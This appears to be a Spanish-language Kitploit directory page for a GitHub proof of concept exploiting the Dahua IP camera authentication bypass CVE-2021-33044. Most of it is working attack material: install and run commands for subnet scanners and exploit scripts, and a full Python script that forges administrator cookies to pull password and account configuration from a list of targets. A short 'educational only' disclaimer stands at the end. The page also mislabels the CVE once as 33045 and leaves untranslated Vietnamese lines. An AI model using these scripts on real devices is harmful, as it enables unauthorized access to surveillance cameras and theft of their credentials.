Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
DAHUA_AUTH-BYPASS-CVE-2021-33044 — Exploit PoC para la omisión de autenticación de Dahua (CVE-2021-33044). Escanea subredes, prueba múltiples CVEs y vuelca configuraciones de dispositivos mediante cookies manipuladas sin credenciales válidas. | Kitploit
Herramientas/GitHubGitHub/eagle-nett/dahua_auth-bypass-cve-2021-33044
Autenticación y AutorizaciónSeguridad IoTAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubeagle-nett/dahua_auth-bypass-cve-2021-33044

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

DAHUA_AUTH-BYPASS-CVE-2021-33044

Exploit PoC para la omisión de autenticación de Dahua (CVE-2021-33044). Escanea subredes, prueba múltiples CVEs y vuelca configuraciones de dispositivos mediante cookies manipuladas sin credenciales válidas.

Ver Repositorio
17hace 5 mesesAún no revisado

Simulación de explotación de Dahua Authentication Bypass PoC (CVE-2021-33044)

Resumen

Las cámaras IP Dahua son dispositivos IoT ampliamente utilizados en sistemas de vigilancia de seguridad. Debido a que se implementan con frecuencia en redes internas o se accede desde Internet, las vulnerabilidades de seguridad en las cámaras IP pueden afectar gravemente la privacidad y la seguridad de la información.

CVE-2021-33045 es una vulnerabilidad de seguridad que existe en algunas líneas de cámaras Dahua, que permite el acceso no autorizado a recursos de configuración internos sin autenticación válida. Esta vulnerabilidad se origina en un mecanismo de control de acceso débil en el firmware del dispositivo.

Información de la vulnerabilidad

ElementoContenido
CVECVE-2021-33044
TipoAuthentication Bypass
GravedadCritical (CVSS ~9.8)
AuthNo requiere autenticación
AfectaDahua Camera / DVR / NVR

Causa

La vulnerabilidad se origina en un diseño de autenticación inseguro en el firmware de las cámaras Dahua:

  • El servidor no verifica correctamente la sesión/token
  • Confía en los datos enviados por el cliente
  • Algunos endpoints de configuración sensibles solo verifican la existencia de la cookie, no los permisos de acceso reales

Esto permite a un atacante:

  • falsificar el proceso de autenticación
  • omitir completamente el inicio de sesión

Referencias:

  • NVD CVE-2021-33044
  • http://seclists.org/fulldisclosure/2021/Oct/13

Funcionamiento del mecanismo de omisión de autenticación

Flujo normal

root@kitploit:~
→ Client gửi HTTP request kèm cookie tùy ý
→ Camera kiểm tra cookie ở mức giao diện
→ Không xác minh session hợp lệ ở backend
→ Cho phép truy cập trực tiếp vào các endpoint cấu hình nội bộ
→ Trả về dữ liệu nhạy cảm

Escenario

Uso

Instalación

root@kitploit:~
# Clone repository
git clone https://github.com/eagle-nett/DAHUA_AUTH-BYPASS-CVE-2021-33044.git
cd DAHUA_AUTH-BYPASS-CVE-2021-33044

pip install requests

Escaneo de red

root@kitploit:~
# Scan subnet (ports required)
python dahua_scanner.py https://example.com -p 80 8080 8800

# Single host with port
python dahua_scanner.py https://example.com

Puertos comunes de Dahua: 80,443, 8080, 37777, 37778

Explotación de vulnerabilidad CVE

root@kitploit:~
python dahua_exploit.py https://example.com -p 8081
python dahua_exploit.py https://example.com -c 2021-33044  #CVE
python dahua_exploit.py --help

Omisión de autenticación

root@kitploit:~
python dahua_auth_bypass.py https://example.com -p 8080
python dahua_auth_bypass.py https://example.com  # Dump thiết bị sau khi bypass

Ejemplo

root@kitploit:~
#!/usr/bin/env python3
import requests, sys
requests.packages.urllib3.disable_warnings()

def dump_accounts(ip, port=80):
    base = f"http://{ip}:{port}"
    cookies = {
        "userName": "admin",
        "userLevel": "1",
        "sessionID": "00000000"
    }
    urls = [
        "/current_config/passwd",
        "/current_config/Account1",
        "/current_config/UserMgr",
        "/current_config/accounts"
    ]

    for path in urls:
        try:
            r = requests.get(
                base + path,
                cookies=cookies,
                verify=False,
                timeout=8
            )
            if r.status_code == 200 and len(r.text) > 30:
                print(f"[+] {ip}:{port}  VULNERABLE → {path}")
                return
        except:
            pass

    print(f"[-] {ip}:{port}  safe / patched")

for line in open("targets.txt"):
    t = line.strip()
    if not t or t.startswith("#"):
        continue
    ip = t.split(":")[0]
    port = int(t.split(":")[1]) if ":" in t else 80
    dump_accounts(ip, port)

Explicación

  • El script utiliza la biblioteca requests y desactiva explícitamente las advertencias SSL para deshabilitar las alertas SSL

  • La función dump_accounts(ip, port=80) es la función principal encargada de verificar un dispositivo de cámara. Las funciones principales de la función son:

    • Construir la URL a partir de la dirección IP y el puerto
    • Simular el estado de inicio de sesión de administrador mediante cookies
    • Enviar solicitudes a los endpoints de configuración sensibles
    • Analizar la respuesta para determinar si el dispositivo está afectado o no
  • Simulación de cookies de autenticación. La función utiliza valores de cookie como:

    • userName=admin
    • userLevel=1
    • sessionID=00000000
  • En las versiones de cámara afectadas, el backend no verifica el sessionID real, lo que lleva a que el sistema crea que la solicitud proviene de una cuenta de administrador válida.

Bucle de procesamiento de lista de objetivos

El script lee la lista de objetivos de un archivo de entrada, llamando a la función de verificación para cada dispositivo. Este enfoque permite evaluar múltiples cámaras de forma automatizada.

image

Proceso de desarrollo

Estos scripts se desarrollaron basándose en:

  • Detalles de CVE publicados por NVD
  • Avisos de seguridad de Dahua
  • Referencias PoC públicas (seclists.org, packetstormsecurity)

Estado de pruebas:

  • La lógica de omisión de autenticación se implementa según las especificaciones del CVE
  • Pruebas limitadas en dispositivos vulnerables.

Nota

Este proyecto:

  • Solo para fines educativos y de investigación
  • Ejecútelo en un entorno de laboratorio personal
Descargar herramienta
ArchivoPropósitoCVEs
dahua_scanner.pyDescubrimiento de red — encontrar cámaras Dahua en la subredDetección
dahua_exploit.pyHerramienta de escaneo Multi-CVE — comprobar todas las vulnerabilidades de seguridad.Todas
dahua_auth_bypass.pyOmisión de autenticación dedicada con opción --dumpCVE-2021-33044